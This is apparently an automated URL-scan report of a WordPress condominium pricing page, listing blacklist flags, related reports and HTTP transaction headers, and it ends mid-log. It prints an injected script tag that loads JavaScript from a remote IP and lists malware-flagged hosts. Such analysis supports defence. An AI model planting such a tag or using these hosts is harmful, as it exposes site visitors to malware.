Overview

URL 1bloorwestcondo.ca/floor-plan-pricing
IP 108.167.172.145
ASN
Location United States
Report completed 2018-12-02 14:10:15 CET
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2018-12-02 2 1bloorwestcondo.ca/floor-plan-pricing Malware
2018-12-02 2 1bloorwestcondo.ca/floor-plan-pricing/ Malware
2018-12-02 2 1bloorwestcondo.ca/wp-content/plugins/contact-form-7/includes/js/scripts.js (...) Malware
2018-12-02 2 1bloorwestcondo.ca/wp-content/themes/1bloorwestcondo/assets/js/custom.js?ver=3.3 Malware
2018-12-02 2 134.249.116.78/jquery.js Malware
2018-12-02 2 185.143.221.14/index.php?cnt=23180211 Malware
2018-12-02 2 www.hibids10.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 108.167.172.145

Date  UQ / IDS / BL  URL  IP
2019-05-08 16:39:36 +0200  0 - 0 - 16  myarccondos.ca/  108.167.172.145
2019-05-07 08:51:20 +0200  0 - 0 - 3  my75esplanadecondos.ca/  108.167.172.145
2019-03-21 11:59:46 +0100  0 - 0 - 0  www.bms.edu.lv/  108.167.172.145
2018-12-02 10:42:29 +0100  0 - 0 - 5  1bloorwestcondo.ca/floor-plan-pricing  108.167.172.145
2018-10-16 15:50:08 +0200  0 - 0 - 0  bexleytheatreparents.org  108.167.172.145
2018-09-30 16:57:49 +0200  0 - 0 - 1  a-uic.com/7343392738ca883f2cb04f2747940fff  108.167.172.145
2018-02-12 15:24:40 +0100  0 - 0 - 0  transportadoracaribeensueno.com/qIPy/  108.167.172.145
2018-02-12 15:06:43 +0100  0 - 0 - 0  transportadoracaribeensueno.com/qIPy/  108.167.172.145
2018-02-12 15:02:48 +0100  0 - 0 - 0  transportadoracaribeensueno.com/INCORRECT-INVOICE/  108.167.172.145
2018-02-12 14:01:17 +0100  0 - 0 - 0  transportadoracaribeensueno.com  108.167.172.145

Last 10 reports on ASN:

Date  UQ / IDS / BL  URL  IP
2019-05-22 01:43:26 +0200  0 - 0 - 1  url.222bz.com/down/sohuva-v5.0.3.32@248_30842.exe  139.224.39.0
2019-05-22 01:43:23 +0200  0 - 0 - 1  url.222bz.com/down/sony%20vegas%20pro11%E6%B3 (...)  114.55.188.114
2019-05-22 01:43:22 +0200  0 - 4 - 1  url.222bz.com/down/microsoftofficepowerpoint2 (...)  139.224.39.0
2019-05-22 01:43:19 +0200  0 - 0 - 1  url.222bz.com/down/lol%E9%9F%A952016@154_1072 (...)  139.224.39.0
2019-05-22 01:43:18 +0200  0 - 4 - 1  url.222bz.com/down/ufffdufffdufffdufffdufffdu (...)  139.224.39.0
2019-05-22 01:43:17 +0200  0 - 2 - 1  url.222bz.com/down/mp3@289_72908.exe  139.224.39.0
2019-05-22 01:43:16 +0200  0 - 4 - 1  url.222bz.com/down/memtest%E5%86%85%E5%AD%98% (...)  114.55.188.114
2019-05-22 01:43:14 +0200  0 - 4 - 1  url.222bz.com/down/b%E8%BD%BD%E5%99%A80.4.7.7 (...)  114.55.188.114
2019-05-22 01:43:14 +0200  0 - 0 - 1  url.222bz.com/down/photoshop@212_64955.exe  114.55.188.114
2019-05-22 01:43:13 +0200  0 - 4 - 1  url.222bz.com/down/photoshop%20cs6%20%E5%AE%8 (...)  114.55.188.114

Last 1 reports on domain: 1bloorwestcondo.ca

Date  UQ / IDS / BL  URL  IP
2018-12-02 10:42:29 +0100  0 - 0 - 5  1bloorwestcondo.ca/floor-plan-pricing  108.167.172.145


JavaScript

Executed Scripts (10)


Executed Evals (0)


Executed Writes (1)

#1 JavaScript::Write (size: 55, repeated: 1) - SHA256: b1247cfc4a293243fe51e76445f0c7fbdec493b931a59e722826bf77015b9514

                                        <script src="http://134.249.116.78/jquery.js"></script>
                                    


HTTP Transactions (54)


Request Response
                                        
                                            GET /floor-plan-pricing HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         108.167.172.145
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:44 GMT
Content-Length: 0
Connection: keep-alive
Location: http://1bloorwestcondo.ca/floor-plan-pricing/


--- Additional Info ---

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /floor-plan-pricing/ HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Link: <http://1bloorwestcondo.ca/wp-json/>; rel="https://api.w.org/", <http://1bloorwestcondo.ca/?p=12>; rel=shortlink
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7566
Md5:    6772463c8ccbd709ab4e93ab7ab94f8e
Sha1:   b35fe3b08e192579c423c7f5f25e8af994e8b69d
Sha256: b72af7ce2a86668be9511d91946469072ebf26d960bb7c08ba7ab712bdbbfae4

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/wp-emoji-release.min.js?ver=4.9.7 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:43 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /css?family=Montserrat%3Aregular%2C700&ver=4.9.7 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         216.58.207.234
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Sun, 02 Dec 2018 13:09:45 GMT
Date: Sun, 02 Dec 2018 13:09:45 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   238
Md5:    b15b7b3f338e45aad2ce6a4c0bfd77fb
Sha1:   f7276b43bd01badd4c09e1f59fb83b9fc5ce09bf
Sha256: ad32ad4b8fe1955de387a7cc8daa6edec26dbe46eaf49e765028e66208b54bf1
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         172.217.21.142
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sun, 02 Dec 2018 13:09:45 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    60a5a6334ad1a90fcdf66e35afa5c433
Sha1:   4784cc9ed7956c4582e243a748db18c5d74acdb4
Sha256: 726828cf1189a6a666d1832f7edd115b73064552f6a85a867c5ccf7499c28f04
                                        
                                            POST /gsr2 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 112
Content-Type: application/ocsp-request

                                         
                                         172.217.21.142
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sun, 02 Dec 2018 13:09:45 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   468
Md5:    d9d754520ae3340aa37cca6115eee05b
Sha1:   a0320372760d99c762cb2eb4b37f776625ef1b33
Sha256: 7dc8284c51c9a38dc1bf03bd28857ea5336e8f5c564eddbb1c9082ee43c93738
                                        
                                            GET /wp-content/uploads/stm_fonts/stm/stm.css?ver=1.0 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sun, 18 Sep 2016 05:03:34 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   794
Md5:    f3a5e97c24e63bcf48a6bdfc3b98a917
Sha1:   52cce5b0adb95068adb77b38c0cf03dd1bbdf667
Sha256: 080d0424a9de2f33c3f119b9cbd353fa89d1dd190c0b71abb1a01d119505ab92
                                        
                                            GET /wp-content/themes/1bloorwestcondo/style.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sun, 18 Sep 2016 15:12:20 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   650
Md5:    c4c10802f753991632f27292bb906e9c
Sha1:   19690cf760e43648cb5d668e4af8fe1e787676b8
Sha256: 10fb1ddfae70cf0ece9261d1595af5cab21d96fa5599b5bb8255d233b59c9e11
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 409 Conflict
Content-Type: text/html; charset=iso-8859-1
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Content-Length: 83
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   83
Md5:    26267cd8990f15d3bbea71684a6d5995
Sha1:   ac3b38cf3fe0e112bb6aeb7e05226b7133575d93
Sha256: 769e8ab745a0fe4bf811036e75a8630e38c50a18cb3e24d539ce4a0722c7c85e
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/css/font-awesome.min.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 17 Jun 2016 12:34:02 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7502
Md5:    d75eb6fad43099947dc318299b97c3ad
Sha1:   eba4ae1b983610cd0d8e45f15432982415485e6a
Sha256: 32f0e59f2f2f5d989c39edfcc1e26f8315b06f245f8855bc903250a28cbe8f61
                                        
                                            GET /css?family=Open+Sans%3A400%2C300%2C300italic%2C400italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%26subset%3Dlatin%2Cgreek%2Cgreek-ext%2Cvietnamese%2Ccyrillic-ext%2Clatin-ext%2Ccyrillic%7CPoppins%3A400%2C500%2C300%2C600%2C700%26subset%3Dlatin%2Clatin-ext%2Cdevanagari&ver=3.3 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         216.58.207.234
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Sun, 02 Dec 2018 13:09:45 GMT
Date: Sun, 02 Dec 2018 13:09:45 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   503
Md5:    77139b29f478c8f5f65b693d9c22e78e
Sha1:   c037a216a9659ca0cdf2ac71b211f55a15308b3f
Sha256: 31d49f905b6385fbd8283881520b4edd7db73c7315b6171d1138115ce5d4b34a
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/css/select2.min.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 17 Jun 2016 12:34:02 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   2424
Md5:    c8096e2aa5ca5ef8e169defeb54a47f4
Sha1:   4731e89601a73d4233b60591bb7503762a2d9e00
Sha256: d0603707f9981c591c3923d412a53e66598aaadf4c65b93e65b070e1d7f4202e
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/css/layout_1/main.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 06 Aug 2016 05:56:54 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   65980
Md5:    4a258e33e2d4c2e32efaf55593f707a8
Sha1:   42c55c188d8c78d79132baf24fce33157daab1f1
Sha256: 81061d6aeb751410f8d6f49ad6aa8881a107af3adfe63376edbcbf391f8e3d40
                                        
                                            GET /wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:42 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/css/bootstrap.min.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 17 Jun 2016 12:34:02 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   24805
Md5:    ebff01cdc478da496c9113d2f4a9157e
Sha1:   f7b42ec92b4bba1ac8ccecf7ce4e9c159394ee51
Sha256: 9034b5e9b0c141c2c5661288e5027f13b80f2b489294d5a6335389a5c074ef68
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:42 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 409 Conflict
Content-Type: text/html; charset=iso-8859-1
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Content-Length: 83
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   83
Md5:    26267cd8990f15d3bbea71684a6d5995
Sha1:   ac3b38cf3fe0e112bb6aeb7e05226b7133575d93
Sha256: 769e8ab745a0fe4bf811036e75a8630e38c50a18cb3e24d539ce4a0722c7c85e

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/js/bootstrap.min.js?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:39 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/css/layout_1/skin_arctic_black.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 17 Jun 2016 12:34:02 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   65646
Md5:    fe3fa649bb98af0e1720ff5abc3a818b
Sha1:   d88284fd9193e847651aab269a01d9e31698639b
Sha256: 0eebb2e20ddde88a295211b3e70cf8f5c2d95b5948ea986824b3a28c9a548c8d
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/js/select2.min.js?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:39 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/js/custom.js?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:39 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.11.2 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 05 Aug 2016 02:06:42 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   78819
Md5:    0b3fbe1902b0eb36088c7863d45fb953
Sha1:   d8e9a7ba306339907b9554e6b59c707dd8508efe
Sha256: 88a32c21a682f8c4cdc8c8271d9fa5a0807316254de9bc32376cf6ab2ce3417a
                                        
                                            GET /wp-includes/js/wp-embed.min.js?ver=4.9.7 HTTP/1.1 
